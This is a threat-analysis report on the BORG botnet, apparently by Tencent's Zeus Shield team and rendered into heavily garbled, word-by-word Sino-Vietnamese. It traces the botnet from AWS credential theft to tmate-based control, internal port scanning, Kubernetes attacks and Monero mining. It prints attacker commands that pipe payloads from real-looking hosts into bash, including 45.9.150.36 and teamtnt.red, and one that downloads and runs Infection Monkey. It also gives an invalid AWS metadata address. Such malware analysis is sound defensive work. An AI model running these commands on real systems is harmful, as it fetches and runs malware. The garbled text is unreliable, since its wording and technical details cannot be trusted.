BORG: Một cái nhanh chóng tiến hóa cương thi internet

Văn ｜Zeus thuẫn lưu lượng an toàn phân tích đoàn đội

Pav1, ngạn tu

Nên công kích giả thoát thai với trước đây TeamTNT tập thể, nhưng là ở trước mặt công kích trung bắt đầu dùng hoàn toàn mới vực danh cùng IP, chỉ có ở bộ phận so lúc đầu ác ý văn kiện trung phỏng vấn TeamTNT tương quan vực danh. Ngoài ra tương đối quan trọng một chút là công kích giả ở công kích thùng dụng cụ trung biên dịch cùng đóng gói đại lượng đến từ khai nguyên xã khu công kích hoặc khống chế lắp ráp, này năng lực cũng so phía trước cũng có rất lớn tiến hóa, công kích giả không hề thỏa mãn với xâm lấn lúc sau cấy vào đào quặng ngựa gỗ kiếm lời, mà là ở xâm lấn lúc sau bắt đầu đối nội võng trung mặt khác máy móc tiến hành dò xét cùng xâm lấn, cũng phê lượng khống chế này đó máy móc. Căn cứ vào này, chúng ta có lý do tin tưởng đây là một cái đang đứng ở khai phá trung, nhanh chóng tiến hóa cương thi internet.

Bởi vì BORG cương thi internet tại tiến hành nhanh chóng thay đổi, cho nên bổn văn đem chọn dùng thời gian tuyến tới tiến hành phân tích, có thể càng thêm rõ ràng miêu tả nên cương thi internet tiến hóa phương hướng cùng kỹ thuật đổi mới.

Ở 2020 năm 12 nguyệt 28 ngày, Zeus thuẫn lưu lượng an toàn phân tích đoàn đội lần đầu tiên bắt được nhằm vào nên cương thi internet nhằm vào Docker công kích, bộ phận Payload như sau:

Lúc này nên cương thi internet truyền bá kịch bản gốc là aws.sh, như sau đồ sở kỳ:

Nên aws.sh kịch bản gốc chủ yếu công năng là thông qua AWS nguyên số liệu phục vụ tới thu hoạch bị cáo trưởng máy an toàn bằng chứng. Trong đó 169.254.269.254 là AWS nguyên số liệu phục vụ địa chỉ, có thể thông qua nên phục vụ tới ở EC2 ví dụ thực tế trung thu hoạch tương quan tin tức, nơi này công kích giả thu hoạch chính là cùng nên bị cáo ví dụ thực tế tương quan IAM nhân vật tin tức, trong đó bao hàm cùng nên nhân vật liên hệ lâm thời an toàn bằng chứng.

Đồng thời, nếu hoàn cảnh lượng biến đổi trung tồn tại “$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI” lượng biến đổi, tắc nhưng tới tuần tra bằng chứng, này bộ phận tình hình cụ thể và tỉ mỉ thấy AWS hồ sơ( phụ lục 1 )

Ở thu hoạch đến an toàn bằng chứng sau, công kích giả sẽ kiểm tra curl mệnh lệnh nhưng dùng tính, nếu không thể dùng tắc sẽ download curl trình tự, sau đó thông qua curl đem số liệu truyền đến chỉ định địa chỉ thượng, hoàn thành an toàn bằng chứng đánh cắp lưu trình, hơn nữa đối tương quan ký lục tiến hành rồi thanh trừ.

Có thể thấy được lúc ban đầu phiên bản ác ý kịch bản gốc công năng đơn giản, cũng không có bảo tồn cửa sau chờ, chỉ là đánh cắp tương quan an toàn bằng chứng, ở cái này giai đoạn, cũng không thể xưng là một cái cương thi internet. Chúng ta phân tích phát hiện, nên phiên bản cùng năm trước 8 tháng an toàn xã khu phát hiện ác ý văn kiện so sánh với cơ bản vô biến hóa, mà nên tập thể cũng nhân cái thứ nhất nhằm vào AWS bằng chứng tiến hành đánh cắp mà thanh danh vang dội.

Ở 2021 năm 1 nguyệt 1 ngày, Zeus thuẫn lưu lượng an toàn phân tích đoàn đội bắt được tới rồi nên cương thi internet lần đầu tiên tiến hóa, công kích Payload như sau sở kỳ:

Có thể thấy được không chỉ có đối đánh cắp kịch bản gốc tiến hành rồi thăng cấp, còn download cũng vận hành hiểu rõ một cái nhưng chấp hành trình tự rsMPpayload.

Đầu tiên tới xem aws2.sh cái này ác ý kịch bản gốc, thông qua phân tích phát hiện cũng không có tiến hành đại biến hóa, chỉ là tăng thêm hai nơi lọc thao tác, đem cùng key tương quan số liệu lọc ra tới tiến hành thượng truyền.

Kế tiếp xem rsMPpayload cái này nhưng chấp hành trình tự, chỉ có 251 byte, chủ yếu công năng là liên tiếp một cái ngạnh mã hóa IP ( 13.82.212.245 ), trước mắt nên IP đã vô pháp liên tiếp, nhưng là có thể cho rằng là nên công kích giả ở cố ý hướng về cương thi internet khống chế kết cấu đi phát triển.

Nên cương thi internet ở ngắn hạn nội công kích Payload cùng xâm lấn sau hành vi nhiều lần biến hóa khiến cho chúng ta chú ý, ngay sau đó chúng ta tiến hành rồi trọng điểm theo dõi, ở 2021 năm 1 nguyệt 6 ngày phát hiện tân biến hóa, lần đầu bắt được tới rồi thỉnh cầu http: //45.9.150.36/t.sh lưu lượng, t.sh là hoàn toàn mới ác ý kịch bản gốc, như sau sở kỳ ( tỉnh lược download hàm số, nên hàm số vô biến hóa ):

Có thể thấy được, nên kịch bản gốc cũng không phải nhằm vào aws máy móc tiến hành an toàn bằng chứng, mà là trở nên càng thêm thông dụng. Công kích giả ở kịch bản gốc trung tăng thêm hiểu rõ thông qua tmate( phụ lục 2 )Trình tự tiến hành tập trung khống chế tương quan số hiệu, cơ bản logic là thu hoạch server nội tồn, CPU, hệ thống chờ tin tức, sinh thành session tự phù xuyến, sau đó thông qua kịch bản gốc ngạnh mã hóa IP[45.9.150.36] download đối ứng tmate trình tự cùng giấy chứng nhận.

Sau đó vận hành tmate trình tự, sử dụng download giấy chứng nhận cùng session tự phù xuyến làm tham số tiến hành online. Trong đó session tự phù xuyến cách thức vì Base64_encode(IP)+XXXXXXXX+ tùy cơ con số. Cuối cùng thông qua HTTP thỉnh cầu đăng báo tương quan server tin tức.

Lúc này, công kích giả có thể thông qua tmate phục vụ tới nhằm vào nên cương thi trưởng máy tiến hành quản lý, đã hình thành cương thi internet khống chế kết cấu. Công kích giả ở bị cáo cơ thượng tuyến sau cũng không có trước tiên chấp hành tương quan mệnh lệnh, mà là ở trải qua 24 giờ chờ đợi sau, mới hạ phát mặt khác mệnh lệnh, “curl -s http://45.9.150.36/pwn/lan.sh | bash”.

Ở lan.sh kịch bản gốc trung, chủ yếu làm hai việc, đầu tiên là trang bị masscan:

Sau đó thông qua masscan nhằm vào nội võng võng đoạn tiến hành rà quét, phán đoán hay không tồn tại mở ra "2375", "2376", "4243", "8181", "6379", "10250", cũng đem kết quả bảo tồn xuống dưới, nếu tìm được rồi mở ra 10250, sau đó tiến hành công kích, trước mắt bắt được hàng mẫu trung, công kích giả chỉ đối 10250 cảng tiến hành rồi công kích, có thể thấy được này chỉ là cái bán thành phẩm, kế tiếp khả năng sẽ tăng thêm nhằm vào kể trên rà quét phi 10250 cảng công kích hàm số.

Nhằm vào 10250 cảng công kích chủ yếu mục đích download đào quặng chân vốn dĩ tiến hành đào quặng.

Trừ bỏ cái này mệnh lệnh ở ngoài, công kích giả còn thông qua tmate phát xuống

“curl -s http://45.9.150.36/outgoing/script_files/xmr3.assi | bash” đào quặng mệnh lệnh.

Lúc sau công kích giả còn phát xuống “curl -# -Lk" https://teamtnt.red/set/up/pei.php?dlmode=curl "| bash” mệnh lệnh cùng “curl -# -Lk" https://teamtnt.red/set/up/bob.php?dlmode=curl "| bash”, thông qua này hai cái chân vốn dĩ download ác ý trình tự, nhằm vào nội võng http, sockets, docker, k8s chờ phục vụ tiến hành rồi công kích.

Thông qua đối “https://teamtnt.red/set/up/pei.php?dlmode=curl” download ác ý trình tự pei tiến hành phân tích, có thể phán đoán là Peirates khai nguyên công cụ( phụ lục 3 ),Peirates là Kubernetes thẩm thấu thí nghiệm công cụ, chuyên chú với đặc quyền tăng lên cùng nằm ngang di động.

Thông qua đối “https://teamtnt.red/set/up/ bob.php?dlmode=curl” download ác ý trình tự bob tiến hành phân tích, có thể phán đoán là botb( phụ lục 4 )Khai nguyên công cụ, BOtB là một khoản vật chứa phân tích cùng phát hiện công cụ, chỉ ở cung thẩm thấu thí nghiệm nhân viên cùng kỹ sư sử dụng. Về này hai khoản công cụ sử dụng có thể xem xét này hồ sơ.

Cuối cùng công kích giả chấp hành “wget --no-check-certificate https://3.104.106.52:5000/api/monkey/download/monkey-linux-64; chmod +x monkey-linux-64;./monkey-linux-64 m0nk3y -s 3.104.106.52:5000 “, thông qua download Infection Monkey( phụ lục 5 )Trình tự tới tiến hành tiến thêm một bước quyền hạn duy trì cùng nằm ngang di động.

Infection Monkey là một khoản khai nguyên an toàn công cụ, bổn ý là dùng để thí nghiệm số liệu trung tâm đối ngoại vây lỗ hổng cùng bên trong server cảm nhiễm khôi phục năng lực, Monkey sử dụng các loại phương pháp ở số liệu trung tâm nội tiến hành tự mình truyền bá, cũng hướng tập trung Monkey Island server báo cáo thành công tình huống. Công kích giả thông qua Infection Monkey tới thực hiện viễn trình khống chế cùng kế tiếp công kích bước đi.

Thông qua đối nên cương thi internet sở sử dụng đào quặng trình tự tiến hành nghịch hướng, phân tích ra này sử dụng chính là khai nguyên công cụ đào mỏ xmrig( phụ lục 6 ).

Thông qua phân tích có thể thu hoạch đến nên đào quặng trình tự phối trí văn kiện, sở khai quật tệ loại là môn la tệ, thông qua tìm tòi có thể thấy được nên địa chỉ còn dư ở 4 cái Worker, đã sản xuất 10+ cái môn la tệ. Trước mắt nên địa chỉ cuối cùng lực ở 23KH/s, căn cứ i5 2300 có 175H/s đào quặng tính lực suy tính, trước mắt nên cương thi internet đào quặng tính lực tương đương với 1300+ đài i5 2300 máy móc đào quặng tính lực.

Thông qua nhằm vào BORG cương thi internet phát triển chải vuốt, có thể thấy được đây là một cái đang không ngừng ưu hoá công kích sức chịu đựng cùng khống chế kết cấu cương thi internet. Không khó phát hiện, công kích giả ở xây dựng một cái hoàn chỉnh cương thi internet khi cũng không phải một lần là xong, mà là sẽ không ngừng tiến hành đổi mới thay đổi. Đồng thời, nên cương thi internet một đại đặc điểm là đại lượng sử dụng nhằm vào giả thuyết hóa ngôi cao tiến hành công kích khai nguyên công cụ, hơn nữa ở khống chế cương thi trưởng máy khi đại lượng sử dụng công cộng khai nguyên lắp ráp, do đó tăng lớn kiểm tra đo lường khó khăn.

Zeus thuẫn lưu lượng an toàn phân tích đoàn đội lệ thuộc với Đằng Tấn an toàn ngôi cao bộ, dựa vào Đằng Tấn an toàn ngôi cao bộ mười lăm năm an toàn kinh nghiệm chế tạo công ty cấp an toàn hệ thống, ngắm nhìn căn cứ vào lưu lượng công kích kiểm tra đo lường, xâm lấn kiểm tra đo lường, lưu lượng chặn cùng với uy hiếp tình báo xây dựng cùng rơi xuống đất công tác, không ngừng khai quật lưu lượng trung an toàn nguy hiểm cũng mở rộng ứng dụng cảnh tượng, kết hợp đại số liệu, AI chờ tuyến đầu kỹ thuật, xây dựng internet lưu lượng thọc sâu phòng ngự hệ thống.

Cảm tạ cách vách Tencent Blade Team leonwxqian sư phó cung cấp ác ý văn kiện phân tích trợ giúp.